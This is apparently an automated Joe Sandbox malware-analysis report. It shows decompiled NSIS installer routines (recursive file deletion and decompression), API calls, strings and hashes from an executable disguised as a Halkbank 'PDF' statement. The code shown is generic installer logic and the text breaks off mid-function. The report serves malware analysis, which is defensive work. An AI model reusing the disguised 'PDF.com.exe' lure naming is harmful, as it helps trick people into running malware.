                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                      • String ID: "C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                      • API String ID: 2292928366-1121976513
                                                      • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                      • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                      • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                      • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                      C-Code - Quality: 98%
                                                      			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                      0x00405d7e
                                                      0x00405d83
                                                      0x00405d8c
                                                      0x00405d8f
                                                      0x00405d97
                                                      0x00405d9a
                                                      0x00405d9d
                                                      0x00405da5
                                                      0x00405da7
                                                      0x00405da8
                                                      0x00000000
                                                      0x00405da8
                                                      0x00405db3
                                                      0x00405db6
                                                      0x00405db6
                                                      0x00405db6
                                                      0x00405dba
                                                      0x00405dcd
                                                      0x00405dd4
                                                      0x00405dd9
                                                      0x00405ddd
                                                      0x00405ded
                                                      0x00405ddf
                                                      0x00405de5
                                                      0x00405de5
                                                      0x00405df2
                                                      0x00405df6
                                                      0x00405e02
                                                      0x00405e08
                                                      0x00405e0d
                                                      0x00405e13
                                                      0x00405e1e
                                                      0x00405e24
                                                      0x00405e26
                                                      0x00405e29
                                                      0x00405ed3
                                                      0x00405ed3
                                                      0x00405ed7
                                                      0x00405ed9
                                                      0x00405ed9
                                                      0x00405ed9
                                                      0x00405ed9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405e2f
                                                      0x00405e2f
                                                      0x00405e2f
                                                      0x00405e37
                                                      0x00405e57
                                                      0x00405e5f
                                                      0x00405e64
                                                      0x00405e6b
                                                      0x00405e86
                                                      0x00405e8b
                                                      0x00405e8d
                                                      0x00405eb1
                                                      0x00405e8f
                                                      0x00405e8f
                                                      0x00405e92
                                                      0x00405ea6
                                                      0x00405e94
                                                      0x00405e97
                                                      0x00405e9f
                                                      0x00405e9f
                                                      0x00405e92
                                                      0x00405e6d
                                                      0x00405e73
                                                      0x00405e75
                                                      0x00405e7b
                                                      0x00405e7b
                                                      0x00405e75
                                                      0x00000000
                                                      0x00405e6b
                                                      0x00405e39
                                                      0x00405e41
                                                      0x00000000
                                                      0x00000000
                                                      0x00405e43
                                                      0x00405e4b
                                                      0x00000000
                                                      0x00000000
                                                      0x00405e4d
                                                      0x00405e55
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405eb6
                                                      0x00405ebe
                                                      0x00405ec4
                                                      0x00405ec4
                                                      0x00405ecd
                                                      0x00000000
                                                      0x00405ecd
                                                      0x00405df8
                                                      0x00405e00
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405dbc
                                                      0x00405dbc
                                                      0x00405dbe
                                                      0x00405ede
                                                      0x00405ee0
                                                      0x00405ee3
                                                      0x00405f34
                                                      0x00405f34
                                                      0x00405f34
                                                      0x00405ee5
                                                      0x00405ee8
                                                      0x00405ef3
                                                      0x00405ef8
                                                      0x00405efa
                                                      0x00000000
                                                      0x00000000
                                                      0x00405efd
                                                      0x00405f09
                                                      0x00405f0e
                                                      0x00405f10
                                                      0x00000000
                                                      0x00405f2b
                                                      0x00405f12
                                                      0x00405f15
                                                      0x00000000
                                                      0x00000000
                                                      0x00405f1a
                                                      0x00000000
                                                      0x00405f21
                                                      0x00405eea
                                                      0x00405eea
                                                      0x00000000
                                                      0x00405eea
                                                      0x00405dc4
                                                      0x00405dc7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405dc7

                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,7476FAA0,7476F560,00000000), ref: 00405D9D
                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsvF67F.tmp\*.*,\*.*), ref: 00405DE5
                                                      • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                      • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsvF67F.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E0E
                                                      • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsvF67F.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsvF67F.tmp\*.*,?,?,7476FAA0,7476F560,00000000), ref: 00405E1E
                                                      • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                      • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsvF67F.tmp\*.*$\*.*
                                                      • API String ID: 2035342205-339633739
                                                      • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                      • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                      • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                      • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 589 406d5f-406d64 590 406dd5-406df3 589->590 591 406d66-406d95 589->591 592 4073cb-4073e0 590->592 593 406d97-406d9a 591->593 594 406d9c-406da0 591->594 595 4073e2-4073f8 592->595 596 4073fa-407410 592->596 597 406dac-406daf 593->597 598 406da2-406da6 594->598 599 406da8 594->599 600 407413-40741a 595->600 596->600 601 406db1-406dba 597->601 602 406dcd-406dd0 597->602 598->597 599->597 606 407441-40744d 600->606 607 40741c-407420 600->607 603 406dbc 601->603 604 406dbf-406dcb 601->604 605 406fa2-406fc0 602->605 603->604 608 406e35-406e63 604->608 612 406fc2-406fd6 605->612 613 406fd8-406fea 605->613 615 406be3-406bec 606->615 609 407426-40743e 607->609 610 4075cf-4075d9 607->610 616 406e65-406e7d 608->616 617 406e7f-406e99 608->617 609->606 614 4075e5-4075f8 610->614 618 406fed-406ff7 612->618 613->618 622 4075fd-407601 614->622 619 406bf2 615->619 620 4075fa 615->620 621 406e9c-406ea6 616->621 617->621 623 406ff9 618->623 624 406f9a-406fa0 618->624 626 406bf9-406bfd 619->626 627 406d39-406d5a 619->627 628 406c9e-406ca2 619->628 629 406d0e-406d12 619->629 620->622 631 406eac 621->631 632 406e1d-406e23 621->632 640 407581-40758b 623->640 641 406f7f-406f97 623->641 624->605 630 406f3e-406f48 624->630 626->614 633 406c03-406c10 626->633 627->592 642 406ca8-406cc1 628->642 643 40754e-407558 628->643 634 406d18-406d2c 629->634 635 40755d-407567 629->635 636 40758d-407597 630->636 637 406f4e-407117 630->637 648 406e02-406e1a 631->648 649 407569-407573 631->649 638 406ed6-406edc 632->638 639 406e29-406e2f 632->639 633->620 647 406c16-406c5c 633->647 650 406d2f-406d37 634->650 635->614 636->614 637->615 645 406f3a 638->645 646 406ede-406efc 638->646 639->608 639->645 640->614 641->624 652 406cc4-406cc8 642->652 643->614 645->630 653 406f14-406f26 646->653 654 406efe-406f12 646->654 655 406c84-406c86 647->655 656 406c5e-406c62 647->656 648->632 649->614 650->627 650->629 652->628 657 406cca-406cd0 652->657 660 406f29-406f33 653->660 654->660 663 406c94-406c9c 655->663 664 406c88-406c92 655->664 661 406c64-406c67 GlobalFree 656->661 662 406c6d-406c7b GlobalAlloc 656->662 658 406cd2-406cd9 657->658 659 406cfa-406d0c 657->659 665 406ce4-406cf4 GlobalAlloc 658->665 666 406cdb-406cde GlobalFree 658->666 659->650 660->638 667 406f35 660->667 661->662 662->620 668 406c81 662->668 663->652 664->663 664->664 665->620 665->659 666->665 670 407575-40757f 667->670 671 406ebb-406ed3 667->671 668->655 670->614 671->638
                                                      C-Code - Quality: 98%
                                                      			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
